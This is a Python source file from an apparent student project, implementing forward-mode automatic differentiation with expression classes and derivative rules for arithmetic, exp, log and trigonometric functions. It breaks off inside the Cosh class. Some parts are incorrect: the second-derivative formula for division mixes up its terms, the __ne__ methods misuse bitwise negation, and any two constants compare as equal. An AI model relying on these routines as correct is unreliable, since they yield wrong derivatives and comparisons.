|
[
"MIT"
] | null | null | null |
autodiff/forward.py
|
D-Y-F-S/cs207-FinalProject
|
57270ccbf7db7f3c1f4deff97af67b3c962fb205
|
[
"MIT"
] | 2
|
2018-12-15T20:45:53.000Z
|
2018-12-15T21:43:32.000Z
|
"""
This file contains the central data structure and functions related to the
forward mode auto differentiation.
"""
import numpy as np
class Expression:
"""
This is a class for representing expression.
It is the super class for variable and constant.
"""
def __init__(self, ele_func, sub_expr1, sub_expr2=None):
"""
The constructor for VectorFunction class.
PARAMETERS:
=======
ele_func: the function creating this expression
sub_expr1: variable/constant composing this expression
sub_expr2: variable/constant composing this expression, set to non
for unary operations
"""
self._ele_func = ele_func
self._sub_expr1 = sub_expr1
self._sub_expr2 = sub_expr2
self.val = None
self.bder=0
def evaluation_at(self, val_dict):
"""
The wrapper function for individual evaluation_at function of
self_ele_func
PARAMETERS:
=======
val_dict: a dictionary containing variable name and values.
RETURNS
========
a scalar value
"""
# self._sub_expr2 is None implies that self._ele_func is an unary operator
if self._sub_expr2 is None:
return self._ele_func.evaluation_at(
self._sub_expr1, val_dict)
# self._sub_expr2 not None implies that self._ele_func is a binary operator
else:
return self._ele_func.evaluation_at(
self._sub_expr1, self._sub_expr2, val_dict)
def derivative_at(self, var, val_dict, order=1):
"""
The wrapper function for individual derivative_at function of
self_ele_func
PARAMETERS:
=======
val_dict: a dictionary containing variable name and values.
var: variable of interests for derivative calculation
RETURNS
========
a scalar value
"""
if type(var) is tuple: order=len(var)
if var is self:
if order == 1: return 1.0
else: return 0.0
# sub_expr2 being None implies that _ele_func is an unary operator
if self._sub_expr2 is None:
return self._ele_func.derivative_at(
self._sub_expr1, var, val_dict, order)
# sub_expr2 not None implies that _ele_func is a binary operator
else:
return self._ele_func.derivative_at(
self._sub_expr1, self._sub_expr2, var, val_dict, order)
def back_derivative(self,var,val_dict):
"""
The wrapper function for individual backderivative_at
function of self_ele_func
PARAMETERS:
=======
val_dict: a dictionary containing variable name and values. Variables
in val_dict are of atomic feature and cannot be further decomposed.
var: variable with respect to which the function calculates derivative
RETURNS
========
derivative of var with respect to the immediate parent that contain var
"""
if var is self: return 1.0
if self._sub_expr2 is None:
return self._ele_func.backderivative_at(self._sub_expr1,var)
else:
return self._ele_func.backderivative_at(self._sub_expr1,
self._sub_expr2,var)
def gradient_at(self, val_dict, returns_dict=False):
"""
calculate 1st derivative of variables in val_dict using forward mode
INPUTS
=======
val_dict: a dictionary containing variable name and values.
returns_dict: the format of output
RETURNS
========
derivative of variables in val_dict with respect to the current
expression, stored in a dictionary or a 2-D numpy array
"""
if returns_dict:
return {v: self.derivative_at(v, val_dict) for v in val_dict.keys()}
return np.array([self.derivative_at(var, val_dict, order=1)
for var in val_dict.keys()])
def hessian_at(self, val_dict):
"""
calculate 2nd derivative of variables in val_dict using forward mode
INPUTS
=======
val_dict: a dictionary containing variable name and values.
RETURNS
========
2nd derivative of variables in val_dict with respect to the current
expression, stored in a 2-D list
"""
return np.array( [ \
[self.derivative_at((var1, var2), val_dict, order=2)
for var1 in val_dict.keys()]
for var2 in val_dict.keys() \
] )
def __neg__(self):
""" Implement dunder method for neg """
return Expression(Neg, self)
def __add__(self, another):
""" Implement dunder method for add """
if isinstance(another, Expression):
return Expression(Add, self, another)
# if the other operand is not an Expression, then it must be a number
# the number then should be converted to a Constant
else:
return Expression(Add, self, Constant(another))
def __radd__(self, another):
""" Implement dunder method for right add """
if isinstance(another, Expression):
return Expression(Add, another, self)
else:
return Expression(Add, Constant(another), self)
def __sub__(self, another):
""" Implement dunder method for subtraction """
if isinstance(another, Expression):
return Expression(Sub, self, another)
else:
return Expression(Sub, self, Constant(another))
def __rsub__(self, another):
""" Implement dunder method for right subtraction """
if isinstance(another, Expression):
return Expression(Sub, another, self)
else:
return Expression(Sub, Constant(another), self)
def __mul__(self, another):
""" Implement dunder method for multiplication """
if isinstance(another, Expression):
return Expression(Mul,self,another)
else:
return Expression(Mul, self, Constant(another))
def __rmul__(self, another):
""" Implement dunder method for right multiplication """
if isinstance(another, Expression):
return Expression(Mul,another,self)
else:
return Expression(Mul, Constant(another),self)
def __truediv__(self, another):
""" Implement dunder method for division """
if isinstance(another, Expression):
return Expression(Div,self,another)
else:
return Expression(Div, self, Constant(another))
def __rtruediv__(self, another):
""" Implement dunder method for right division """
if isinstance(another, Expression):
return Expression(Div,another,self)
else:
return Expression(Div, Constant(another),self)
def __pow__(self,another):
""" Implement dunder method for power """
if isinstance(another, Expression):
return Expression(Pow,self,another)
else:
return Expression(Pow, self, Constant(another))
def __rpow__(self,another):
""" Implement dunder method for right power """
if isinstance(another, Expression):
return Expression(Pow,another,self)
else:
return Expression(Pow, Constant(another),self)
def __eq__(self, another):
""" Implement dunder method for equal """
if not isinstance(another, Expression):
return False
return self._ele_func == another._ele_func \
and self._sub_expr1 == another._sub_expr1 \
and self._sub_expr2 == another._sub_expr2
def __ne__(self, another):
""" Implement dunder method not equal """
return ~self.__eq__(another)
def __hash__(self):
""" Implement dunder method hash """
return object.__hash__(self)
class Variable(Expression):
"""
This is a class for representing variable.
"""
def __init__(self):
"""
The constructor for VectorFunction class.
It has no parameters:
"""
self.val = None
self.bder = 0
return
def evaluation_at(self, val_dict):
"""
The function to evaluation the value of variable class
PARAMETERS:
=======
val_dict: a dictionary containing variable name and values.
RETURNS
========
a scalar value
"""
return val_dict[self]
def derivative_at(self, var, val_dict, order=1):
"""
The function calculates derivative of variable class.
PARAMETERS:
=======
val_dict: a dictionary containing variable name and values.
var: variable whose derivative is the result of this function
order: default set to 1 for 1st derivative, change to 2 for
higher order
RETURNS
========
scalar value
"""
if order == 1:
return 1.0 if var is self else 0.0
else:
return 0.0
def __eq__(self, another):
""" Implement dunder method for equal """
return another is self
def __ne__(self, another):
""" Implement dunder method for not equal """
return ~self.__eq__(another)
def __hash__(self):
""" Implement dunder method for hash """
return Expression.__hash__(self)
class Constant(Expression):
"""
This is a class for representing constant.
Attributes:
val: value of the constant
"""
def __init__(self, val):
"""
The constructor for VectorFunction class.
PARAMETERS:
=======
val: the value of the constant object
"""
self.val = val
def evaluation_at(self, val_dict):
"""
The function to evaluation the value of constant class
PARAMETERS:
=======
val_dict: a dictionary containing variable name and values.
RETURNS
========
a scalar value
"""
return self.val
def derivative_at(self, var, val_dict, order=1):
"""
The function calculates derivative of constant class.
PARAMETERS:
=======
val_dict: a dictionary containing variable name and values.
var: variable whose derivative is the result of this function
order: default set to 1 for 1st derivative, change to 2 for
higher order
RETURNS
========
scalar value
"""
return 0.0
def __eq__(self, another):
""" Implement dunder method for equal """
if isinstance(another, Constant): return True
else: return False
def __ne__(self, another):
""" Implement dunder method for not equal """
return ~self.__eq__(another)
def __hash__(self):
""" Implement dunder method for hash"""
return Expression.__hash__(self)
class VectorFunction:
"""
This is a class for applying operations to a vector of variables.
Attributes:
_exprlist: a list of expressions with respect to which the operations
are applied
"""
def __init__(self, exprlist):
"""
The constructor for VectorFunction class.
PARAMETERS:
=======
exprlist: a list of expressions with respect to which the class
functions are applied to
"""
self._exprlist = exprlist.copy()
def evaluation_at(self, val_dict):
"""
The function to apply evaluation_at to a vector of expressions.
PARAMETERS:
=======
val_dict: a dictionary containing variable name and values.
RETURNS
========
a numpy array containing value of expressions in the self._exprlist.
"""
return np.array([expr.evaluation_at(val_dict)
for expr in self._exprlist])
def gradient_at(self, var, val_dict):
"""
The function to apply derivative_at to a vector of expressions.
PARAMETERS:
=======
val_dict: a dictionary containing variable name and values.
var: variable whose derivative is the result of this function
RETURNS
========
a numpy array containing first derivative of expressions in
self._exprlist with respect to var.
"""
return np.array([f.derivative_at(var, val_dict) for f in self._exprlist])
def jacobian_at(self, val_dict):
"""
The function to calculate jacobian with respect to atomic variables in
val_dict.
PARAMETERS:
=======
val_dict: a dictionary containing variable name and values.
RETURNS
========
a 2-D numpy array containing derivatives of variables in val_dict
with resepct to expressions in self._exprlist.
"""
return np.array([self.gradient_at(var, val_dict)
for var in val_dict.keys()]).transpose()
class Add:
"""
This is a class to wrap up static method related to add operation
"""
@staticmethod
def evaluation_at(sub_expr1, sub_expr2, val_dict):
"""
Compute addition of sub_expr1 with sub_expr2 using inputs of variable
values from val_dict.
INPUTS
=======
sub_expr1: expression or constant
sub_expr2: expression or constant
val_dict: a dictionary containing variable name and values.
RETURNS
========
sub_expr1 + sub_expr2
"""
return sub_expr1.evaluation_at(val_dict) + \
sub_expr2.evaluation_at(val_dict)
@staticmethod
def derivative_at(sub_expr1, sub_expr2, var, val_dict, order=1):
return sub_expr1.derivative_at(var, val_dict, order) + \
sub_expr2.derivative_at(var, val_dict, order)
@staticmethod
def backderivative_at(sub_expr1,sub_expr2,var):
"""
calculate 1st derivative of var using back propagation
INPUTS
=======
sub_expr1: expression or constant
sub_expr2: expression or constant
var: variable of interest
RETURNS
========
derivative of var with respect to sub_expr1
"""
return 1
class Sub:
"""
This is a class to wrap up static method related to sub operation
"""
@staticmethod
def evaluation_at(sub_expr1, sub_expr2, val_dict):
"""
Compute subtraction of sub_expr2 from sub_expr1 using inputs of variable
values from val_dict.
INPUTS
=======
sub_expr1: expression or constant
sub_expr2: expression or constant
val_dict: a dictionary containing variable name and values.
RETURNS
========
sub_expr1 - sub_expr2
"""
return sub_expr1.evaluation_at(val_dict) - \
sub_expr2.evaluation_at(val_dict)
@staticmethod
def derivative_at(sub_expr1, sub_expr2, var, val_dict, order=1):
"""
calculate 1st derivative of var using forward mode
INPUTS
=======
sub_expr1: expression or constant
sub_expr2: expression or constant
val_dict: a dictionary containing variable name and values.
var: variable of interest
order: default set to 1, set to 2 if 2nd derivative is desired
RETURNS
========
derivative of var with respect to sub_expr1
"""
return sub_expr1.derivative_at(var, val_dict, order) - \
sub_expr2.derivative_at(var, val_dict, order)
@staticmethod
def backderivative_at(sub_expr1,sub_expr2,var):
"""
calculate 1st derivative of var using back propagation
INPUTS
=======
sub_expr1: expression or constant
sub_expr2: expression or constant
var: variable of interest
RETURNS
========
derivative of var with respect to sub_expr1
"""
if var == sub_expr1:
return 1
if var == sub_expr2:
return -1
class Mul:
"""
This is a class to wrap up static method related to mul operation
"""
@staticmethod
def evaluation_at(sub_expr1, sub_expr2, val_dict):
"""
Compute multiplication of sub_expr1 with sub_expr2 using inputs
of variable values from val_dict.
INPUTS
=======
sub_expr1: expression or constant
sub_expr2: expression or constant
val_dict: a dictionary containing variable name and values.
RETURNS
========
sub_expr1 * sub_expr2
"""
return sub_expr1.evaluation_at(val_dict) *\
sub_expr2.evaluation_at(val_dict)
@staticmethod
def derivative_at(sub_expr1, sub_expr2, var, val_dict,order=1):
"""
calculate 1st derivative of var using forward mode
INPUTS
=======
sub_expr1: expression or constant
sub_expr2: expression or constant
val_dict: a dictionary containing variable name and values.
var: variable of interest
order: default set to 1, set to 2 if 2nd derivative is desired
RETURNS
========
derivative of var with respect to sub_expr1
"""
if order == 1:
return sub_expr1.derivative_at(var, val_dict) * \
sub_expr2.evaluation_at(val_dict)+ \
sub_expr1.evaluation_at(val_dict) *\
sub_expr2.derivative_at(var, val_dict)
elif order == 2:
if type(var) is tuple:
var1, var2 = var
term1 = sub_expr1.derivative_at(var, val_dict, order=2) \
* sub_expr2.evaluation_at(val_dict)
term2 = sub_expr2.derivative_at(var, val_dict, order=2) \
* sub_expr1.evaluation_at(val_dict)
term3 = sub_expr1.derivative_at(var1, val_dict, order=1) \
* sub_expr2.derivative_at(var2, val_dict, order=1)
term4 = sub_expr2.derivative_at(var1, val_dict, order=1) \
* sub_expr1.derivative_at(var2, val_dict, order=1)
return term1 + term2 + term3 + term4
else:
return Mul.derivative_at(sub_expr1, sub_expr2, (var, var), val_dict, order=2)
else: raise NotImplementedError('3rd order or higher derivatives are not implemented.')
@staticmethod
def backderivative_at(sub_expr1,sub_expr2,var):
"""
calculate 1st derivative of var using back propagation
INPUTS
=======
sub_expr1: expression or constant
sub_expr2: expression or constant
var: variable of interest
RETURNS
========
derivative of var with respect to sub_expr1
"""
if var == sub_expr1:
return sub_expr2.val
else:
return sub_expr1.val
class Div:
"""
This is a class to wrap up static method related to div operation
"""
@staticmethod
def evaluation_at(sub_expr1, sub_expr2, val_dict):
"""
Compute division of sub_expr1 by sub_expr2 using inputs of variable
values from val_dict.
INPUTS
=======
sub_expr1: expression or constant
sub_expr2: expression or constant
val_dict: a dictionary containing variable name and values.
RETURNS
========
sub_expr1 / sub_expr2
"""
return sub_expr1.evaluation_at(val_dict) /\
sub_expr2.evaluation_at(val_dict)
@staticmethod
def derivative_at(sub_expr1, sub_expr2, var, val_dict,order=1):
"""
calculate 1st derivative of var using forward mode
INPUTS
=======
sub_expr1: expression or constant
sub_expr2: expression or constant
val_dict: a dictionary containing variable name and values.
var: variable of interest
order: default set to 1, set to 2 if 2nd derivative is desired
RETURNS
========
derivative of var with respect to sub_expr1
"""
if order == 1:
return sub_expr1.derivative_at(var, val_dict) / \
sub_expr2.evaluation_at(val_dict)- \
sub_expr1.evaluation_at(val_dict) *\
sub_expr2.derivative_at(var, val_dict)/\
sub_expr2.evaluation_at(val_dict)**2
elif order == 2:
if type(var) is tuple:
var1, var2 = var
f = sub_expr1.evaluation_at(val_dict)
g = sub_expr2.evaluation_at(val_dict)
term1 = 1/g * sub_expr2.derivative_at(var, val_dict, order=2)
term2 = -f/g**2 * sub_expr1.derivative_at(var, val_dict, order=2)
term3 = -1/g**2 * sub_expr1.derivative_at(var1, val_dict, order=1) \
* sub_expr2.derivative_at(var2, val_dict, order=1)
term4 = -1/g**2 * sub_expr1.derivative_at(var2, val_dict, order=1) \
* sub_expr2.derivative_at(var1, val_dict, order=1)
term5 = 2*f/g**3 * sub_expr2.derivative_at(var1, val_dict, order=1) \
* sub_expr2.derivative_at(var2, val_dict, order=1)
return term1 + term2 + term3 + term4 + term5
else:
return Div.derivative_at(sub_expr1, sub_expr2, (var, var), val_dict, order=2)
else: raise NotImplementedError('3rd order or higher derivatives are not implemented.')
@staticmethod
def backderivative_at(sub_expr1,sub_expr2,var):
"""
calculate 1st derivative of var using back propagation
INPUTS
=======
sub_expr1: expression or constant
sub_expr2: expression or constant
var: variable of interest
RETURNS
========
derivative of var with respect to sub_expr1
"""
if var == sub_expr1:
return 1/sub_expr2.val
elif var == sub_expr2:
return -sub_expr1.val/sub_expr2.val**2
class Pow:
"""
This is a class to wrap up static method related to pow operation
"""
@staticmethod
def evaluation_at(sub_expr1, sub_expr2, val_dict):
"""
Compute sub_expr1 to the sub_expr2 power using inputs of variable
values from val_dict.
INPUTS
=======
sub_expr1: expression or constant
sub_expr2: constant
val_dict: a dictionary containing variable name and values.
RETURNS
========
sub_expr1 ** sub_expr2
"""
return np.power(sub_expr1.evaluation_at(val_dict),
sub_expr2.evaluation_at(val_dict))
@staticmethod
def derivative_at(sub_expr1, sub_expr2, var, val_dict,order=1):
"""
calculate 1st derivative of var using forward mode
INPUTS
=======
sub_expr1: expression or constant
sub_expr2: expression or constant
val_dict: a dictionary containing variable name and values.
var: variable of interest
order: default set to 1, set to 2 if 2nd derivative is desired
RETURNS
========
derivative of var with respect to sub_expr1
"""
p = sub_expr2.evaluation_at(val_dict)
if order == 1:
return p*np.power(sub_expr1.evaluation_at(val_dict), p-1.0) \
* sub_expr1.derivative_at(var, val_dict)
elif order == 2:
if type(var) is tuple:
var1, var2 = var
term1 = p*np.power(sub_expr1.evaluation_at(val_dict), p-1.0) \
* sub_expr1.derivative_at((var1, var2), val_dict, order=2)
term2 = p*(p-1.0)*np.power(sub_expr1.evaluation_at(val_dict), p-2.0) \
* sub_expr1.derivative_at(var1, val_dict, order=1) \
* sub_expr1.derivative_at(var2, val_dict, order=1)
return term1 + term2
else:
return Pow.derivative_at(sub_expr1, sub_expr2, (var, var), val_dict, order=2)
else: raise NotImplementedError('3rd order or higher derivatives are not implemented.')
@staticmethod
def backderivative_at(sub_expr1,sub_expr2,var):
"""
calculate 1st derivative of var using back propagation
INPUTS
=======
sub_expr1: expression or constant
sub_expr2: expression or constant
var: variable of interest
RETURNS
========
derivative of var with respect to sub_expr1
"""
p = sub_expr2.val
return p*np.power(sub_expr1.val, p-1.0)
def power(expr, p):
return Expression(Pow, expr, Constant(p))
def sqrt(expr):
return Expression(Pow, expr, Constant(0.5))
class Exp:
"""
This is a class to wrap up static method related to exp operation
"""
@staticmethod
def evaluation_at(sub_expr1, val_dict):
"""
Compute exponent of sub_expr1 using inputs of variable
values from val_dict.
INPUTS
=======
sub_expr1: expression or constant
val_dict: a dictionary containing variable name and values.
RETURNS
========
exponent(sub_expr1)
"""
return np.exp(sub_expr1.evaluation_at(val_dict))
@staticmethod
def derivative_at(sub_expr1, var, val_dict, order=1):
"""
calculate 1st derivative of var using forward mode
INPUTS
=======
sub_expr1: expression whose components include var(or itself be to var)
val_dict: a dictionary containing variable name and values.
var: variable of interest
order: default set to 1, set to 2 if 2nd derivative is desired
RETURNS
========
derivative of var with respect to sub_expr1
"""
if order == 1:
return sub_expr1.derivative_at(var, val_dict) * \
np.exp(sub_expr1.evaluation_at(val_dict))
elif order == 2:
if type(var) is tuple:
var1, var2 = var
f = sub_expr1.evaluation_at(val_dict)
term1 = np.exp(f) * sub_expr1.derivative_at(var, val_dict, order=2)
term2 = np.exp(f) * sub_expr1.derivative_at(var1, val_dict, order=1) \
* sub_expr1.derivative_at(var2, val_dict, order=1)
return term1 + term2
else:
return Exp.derivative_at(sub_expr1, (var,var), val_dict, order=2)
else: raise NotImplementedError('3rd order or higher derivatives are not implemented.')
@staticmethod
def backderivative_at(sub_expr1,var):
"""
calculate 1st derivative of var using back propagation
INPUTS
=======
sub_expr1: expression or constant
var: variable of interest
RETURNS
========
derivative of var with respect to sub_expr1
"""
return np.exp(sub_expr1.val)
def exp(expr):
return Expression(Exp, expr)
class Log:
@staticmethod
def evaluation_at(sub_expr1, val_dict):
return np.log(sub_expr1.evaluation_at(val_dict))
@staticmethod
def derivative_at(sub_expr1, var, val_dict, order=1):
if order == 1:
return 1 / sub_expr1.evaluation_at(val_dict) * sub_expr1.derivative_at(var, val_dict)
elif order == 2:
if type(var) is tuple:
var1, var2 = var
f = sub_expr1.evaluation_at(val_dict)
term1 = 1/f * sub_expr1.derivative_at(var, val_dict, order=2)
term2 = -1/f**2 * sub_expr1.derivative_at(var1, val_dict, order=1) \
* sub_expr1.derivative_at(var2, val_dict, order=1)
return term1 + term2
else:
return Log.derivative_at(sub_expr1, (var,var), val_dict, order=2)
else: raise NotImplementedError('3rd order or higher derivatives are not implemented.')
def backderivative_at(sub_expr1,var):
if sub_expr1 == var:
return 1/sub_expr1.val
def log(expr):
return Expression(Log, expr)
class Neg:
"""
This is a class to wrap up static method related to neg operation
"""
@staticmethod
def evaluation_at(sub_expr1, val_dict):
"""
Compute negation of sub_expr1 using inputs of variable
values from val_dict.
INPUTS
=======
sub_expr1: expression or constant
val_dict: a dictionary containing variable name and values.
RETURNS
========
negate sub_expr1
"""
return -sub_expr1.evaluation_at(val_dict)
@staticmethod
def derivative_at(sub_expr1, var, val_dict, order=1):
"""
calculate 1st derivative of var using forward mode
INPUTS
=======
sub_expr1: expression whose components include var(or itself be to var)
val_dict: a dictionary containing variable name and values.
var: variable of interest
order: default set to 1, set to 2 if 2nd derivative is desired
RETURNS
========
derivative of var with respect to sub_expr1
"""
return -sub_expr1.derivative_at(var, val_dict, order)
@staticmethod
def backderivative_at(sub_expr1,var):
"""
calculate 1st derivative of var using back propagation
INPUTS
=======
sub_expr1: expression or constant
var: variable of interest
RETURNS
========
derivative of var with respect to sub_expr1
"""
return -1
class Sin:
"""
This is a class to wrap up static method related to sin operation
"""
@staticmethod
def evaluation_at(sub_expr1, val_dict):
"""
Compute sin of sub_expr1 with inputs of variable values from val_dict.
INPUTS
=======
val_dict: a dictionary containing variable name and values.
RETURNS
========
sin of sub_expr1
"""
return np.sin(sub_expr1.evaluation_at(val_dict))
@staticmethod
def derivative_at(sub_expr1, var, val_dict, order=1):
"""
calculate 1st derivative of var using forward mode
INPUTS
=======
sub_expr1: expression or constant
val_dict: a dictionary containing variable name and values.
var: variable of interest
order: default set to 1, set to 2 if 2nd derivative is desired
RETURNS
========
derivative of var with respect to sub_expr1
"""
if order == 1:
return sub_expr1.derivative_at(var, val_dict) * \
np.cos(sub_expr1.evaluation_at(val_dict))
elif order == 2:
if type(var) is tuple:
var1, var2 = var
f = sub_expr1.evaluation_at(val_dict)
term1 = np.cos(f) * sub_expr1.derivative_at(var, val_dict, order=2)
term2 = -np.sin(f) * sub_expr1.derivative_at(var1, val_dict, order=1) \
* sub_expr1.derivative_at(var2, val_dict, order=1)
return term1 + term2
else:
return Sin.derivative_at(sub_expr1, (var,var), val_dict, order=2)
else: raise NotImplementedError('3rd order or higher derivatives are not implemented.')
@staticmethod
def backderivative_at(sub_expr1,var):
"""
calculate 1st derivative of var using back propagation
INPUTS
=======
sub_expr1: expression whose components include var(or itself be to var)
var: variable of interest
RETURNS
========
derivative of var with respect to sub_expr1
"""
return np.cos(sub_expr1.val)
def sin(expr):
return Expression(Sin, expr)
class Cos:
"""
This is a class to wrap up static method related to cos operation
"""
@staticmethod
def evaluation_at(sub_expr1,val_dict):
"""
Compute cos of sub_expr1 with inputs of variable values from val_dict.
INPUTS
=======
val_dict: a dictionary containing variable name and values.
RETURNS
========
cos sub_expr1
"""
return np.cos(sub_expr1.evaluation_at(val_dict))
@staticmethod
def derivative_at(sub_expr1,var,val_dict, order=1):
"""
calculate 1st derivative of var using forward mode
INPUTS
=======
sub_expr1: expression or constant
val_dict: a dictionary containing variable name and values.
var: variable of interest
order: default to 1, set to 2 if 2nd derivative is desired
RETURNS
========
derivative of var with respect to sub_expr1
"""
if order == 1:
return -sub_expr1.derivative_at(var, val_dict, order) * \
np.sin(sub_expr1.evaluation_at(val_dict))
elif order == 2:
if type(var) is tuple:
var1, var2 = var
f = sub_expr1.evaluation_at(val_dict)
term1 = -np.sin(f) * sub_expr1.derivative_at(var, val_dict, order=2)
term2 = -np.cos(f) * sub_expr1.derivative_at(var1, val_dict, order=1) \
* sub_expr1.derivative_at(var2, val_dict, order=1)
return term1 + term2
else:
return Cos.derivative_at(sub_expr1, (var,var), val_dict, order=2)
else: raise NotImplementedError('3rd order or higher derivatives are not implemented.')
@staticmethod
def backderivative_at(sub_expr1,var):
"""
calculate 1st derivative of var using back propagation
INPUTS
=======
sub_expr1: expression whose components include var(or itself be to var)
var: variable of interest
RETURNS
========
derivative of var with respect to sub_expr1
"""
return -np.sin(sub_expr1.val)
def cos(expr):
return Expression(Cos, expr)
class Tan:
"""
This is a class to wrap up static method related to tan operation
"""
@staticmethod
def evaluation_at(sub_expr1,val_dict):
"""
Compute tan of sub_expr1 with inputs of variable values from val_dict.
INPUTS
=======
val_dict: a dictionary containing variable name and values.
RETURNS
========
tan sub_expr1
"""
return np.tan(sub_expr1.evaluation_at(val_dict))
@staticmethod
def derivative_at(sub_expr1,var,val_dict, order=1):
"""
calculate 1st derivative of var using forward mode
INPUTS
=======
sub_expr1: expression or constant
val_dict: a dictionary containing variable name and values.
var: variable of interest
order: default to 1, set to 2 if 2nd derivative is desired
RETURNS
========
derivative of var with respect to sub_expr1
"""
if order == 1:
return sub_expr1.derivative_at(var, val_dict) /(np.cos(sub_expr1.evaluation_at(val_dict))**2)
elif order == 2:
if type(var) is tuple:
var1, var2 = var
f = sub_expr1.evaluation_at(val_dict)
term1 = 1/(np.cos(f)**2) * sub_expr1.derivative_at(var, val_dict, order=2)
term2 = 2*np.tan(f)/(np.cos(f)**2) \
* sub_expr1.derivative_at(var1, val_dict, order=1) \
* sub_expr1.derivative_at(var2, val_dict, order=1)
return term1 + term2
else:
return Tan.derivative_at(sub_expr1, (var,var), val_dict, order=2)
else: raise NotImplementedError('3rd order or higher derivatives are not implemented.')
@staticmethod
def backderivative_at(sub_expr1,var):
"""
calculate 1st derivative of var using back propagation
INPUTS
=======
sub_expr1: expression whose components include var(or itself be to var)
var: variable of interest
RETURNS
========
derivative of var with respect to sub_expr1
"""
return 1/(np.cos(sub_expr1.val)**2)
def tan(expr):
return Expression(Tan, expr)
class Cotan:
"""
This is a class to wrap up static method related to cotan operation
"""
@staticmethod
def evaluation_at(sub_expr1,val_dict):
"""
Compute cotan of sub_expr1 with inputs of variable values from val_dict.
INPUTS
=======
val_dict: a dictionary containing variable name and values.
RETURNS
========
cotan sub_expr1
"""
return 1/np.tan(sub_expr1.evaluation_at(val_dict))
@staticmethod
def derivative_at(sub_expr1,var,val_dict, order=1):
"""
calculate 1st derivative of var using forward mode
INPUTS
=======
sub_expr1: expression whose components include var(or itself be to var)
val_dict: a dictionary containing variable name and values.
var: variable of interest
order: default to 1, set to 2 if 2nd derivative is desired
RETURNS
========
derivative of var with respect to sub_expr1
"""
if order == 1:
return -sub_expr1.derivative_at(var, val_dict)/(np.sin(sub_expr1.evaluation_at(val_dict))**2)
else: raise NotImplementedError('higher order derivatives not implemented for cotan.')
@staticmethod
def backderivative_at(sub_expr1,var):
"""
calculate 1st derivative of var using back propagation
INPUTS
=======
sub_expr1: expression whose components include var(or itself be to var)
var: variable of interest
RETURNS
========
derivative of var with respect to sub_expr1
"""
return -1/(np.sin(sub_expr1.val)**2)
def cotan(expr):
return Expression(Cotan, expr)
class Sec:
"""
This is a class to wrap up static method related to sec operation
"""
@staticmethod
def evaluation_at(sub_expr1,val_dict):
"""
Compute sec of sub_expr1 with inputs of variable values from val_dict.
INPUTS
=======
val_dict: a dictionary containing variable name and values.
RETURNS
========
sec sub_expr1
"""
return 1/np.cos(sub_expr1.evaluation_at(val_dict))
@staticmethod
def derivative_at(sub_expr1,var,val_dict, order=1):
"""
calculate 1st derivative of var using forward mode
INPUTS
=======
sub_expr1: expression whose components include var(or itself be to var)
val_dict: a dictionary containing variable name and values.
var: variable of interest
order: default to 1, set to 2 if 2nd derivative is desired
RETURNS
========
derivative of var with respect to sub_expr1
"""
x = sub_expr1.evaluation_at(val_dict)
if order == 1:
return sub_expr1.derivative_at(var, val_dict) * \
np.tan(x) * (1/np.cos(x))
else: raise NotImplementedError('higher order derivatives not implemented for sec.')
@staticmethod
def backderivative_at(sub_expr1,var):
"""
calculate 1st derivative of var using back propagation
INPUTS
=======
sub_expr1: expression whose components include var(or itself be to var)
var: variable of interest
RETURNS
========
derivative of var with respect to sub_expr1
"""
x =sub_expr1.val
return np.tan(x)/np.cos(x)
def sec(expr):
return Expression(Sec, expr)
class Csc:
"""
This is a class to wrap up static method related to csc operation
"""
@staticmethod
def evaluation_at(sub_expr1,val_dict):
"""
Compute csc of sub_expr1 with inputs of variable values from val_dict.
INPUTS
=======
val_dict: a dictionary containing variable name and values.
RETURNS
========
csc sub_expr1
"""
return 1/np.sin(sub_expr1.evaluation_at(val_dict))
@staticmethod
def derivative_at(sub_expr1,var,val_dict, order=1):
"""
calculate 1st derivative of var using forward mode
INPUTS
=======
sub_expr1: expression whose components include var(or itself be to var)
val_dict: a dictionary containing variable name and values.
var: variable of interest
order: default to 1, set to 2 if 2nd derivative is desired
RETURNS
========
derivative of var with respect to sub_expr1
"""
x = sub_expr1.evaluation_at(val_dict)
if order == 1:
return -sub_expr1.derivative_at(var, val_dict) * \
(1/np.tan(x)) * (1/np.sin(x))
else: raise NotImplementedError('higher order derivatives not implemented for csc.')
@staticmethod
def backderivative_at(sub_expr1,var):
"""
calculate 1st derivative of var using back propagation
INPUTS
=======
sub_expr1: expression whose components include var(or itself be to var)
var: variable of interest
RETURNS
========
derivative of var with respect to sub_expr1
"""
x = sub_expr1.val
return -(1/np.tan(x)) * (1/np.sin(x))
def csc(expr):
return Expression(Csc, expr)
class Sinh:
"""
This is a class to wrap up static method related to sinh operation
"""
@staticmethod
def evaluation_at(sub_expr1,val_dict):
"""
Compute sinh of sub_expr1 with inputs of variable values from val_dict.
INPUTS
=======
val_dict: a dictionary containing variable name and values.
RETURNS
========
sinh sub_expr1
"""
return np.sinh(sub_expr1.evaluation_at(val_dict))
@staticmethod
def derivative_at(sub_expr1,var,val_dict, order=1):
"""
calculate 1st derivative of var using forward mode
INPUTS
=======
sub_expr1: expression whose components include var(or itself be to var)
val_dict: a dictionary containing variable name and values.
var: variable of interest
order: default to 1, set to 2 if 2nd derivative is desired
RETURNS
========
derivative of var with respect to sub_expr1
"""
x = sub_expr1.evaluation_at(val_dict)
if order == 1:
return sub_expr1.derivative_at(var, val_dict) * np.cosh(x)
else: raise NotImplementedError('higher order derivatives not implemented for sinh.')
@staticmethod
def backderivative_at(sub_expr1,var):
"""
calculate 1st derivative of var using back propagation
INPUTS
=======
sub_expr1: expression whose components include var(or itself be to var)
var: variable of interest
RETURNS
========
derivative of var with respect to sub_expr1
"""
x = sub_expr1.val
return np.cosh(x)
def sinh(expr):
return Expression(Sinh, expr)
class Cosh:
"""
This is a class to wrap up static method related to cosh operation
"""
@staticmethod
def evaluation_at(sub_expr1,val_dict):
"""
Compute cosh of sub_expr1 with inputs of variable values from val_dict.
INPUTS
=======
val_dict: a dictionary containing variable name and values.
RETURNS
========
cosh sub_expr1
"""
return np.cosh(sub_expr1.evaluation_at(val_dict))
@staticmethod
def derivative_at(sub_expr1,var,val_dict, order=1):
"""
calculate 1st derivative of var using forward mode
INPUTS
=======
sub_expr1: expression whose components include var(or itself be to var)
val_dict: a dictionary containing variable name and values.
var: variable of interest
order: default to 1, set to 2 if 2nd derivative is desired
RETURNS
========
derivative of var with respect to sub_expr1
"""
x = sub_expr1.evaluation_at(val_dict)
if order == 1:
return sub_expr1.derivative_at(var, val_dict) * np.sinh(x)
else: raise NotImplementedError('higher order derivatives not implemented for cosh.')
@staticmethod
def backderivative_at(sub_expr1,var):
"""
calculate 1st derivative of var using back propagation
INPUTS
=======
sub_expr1: expression whose components include var(or itself be to var)
var: variable of interest
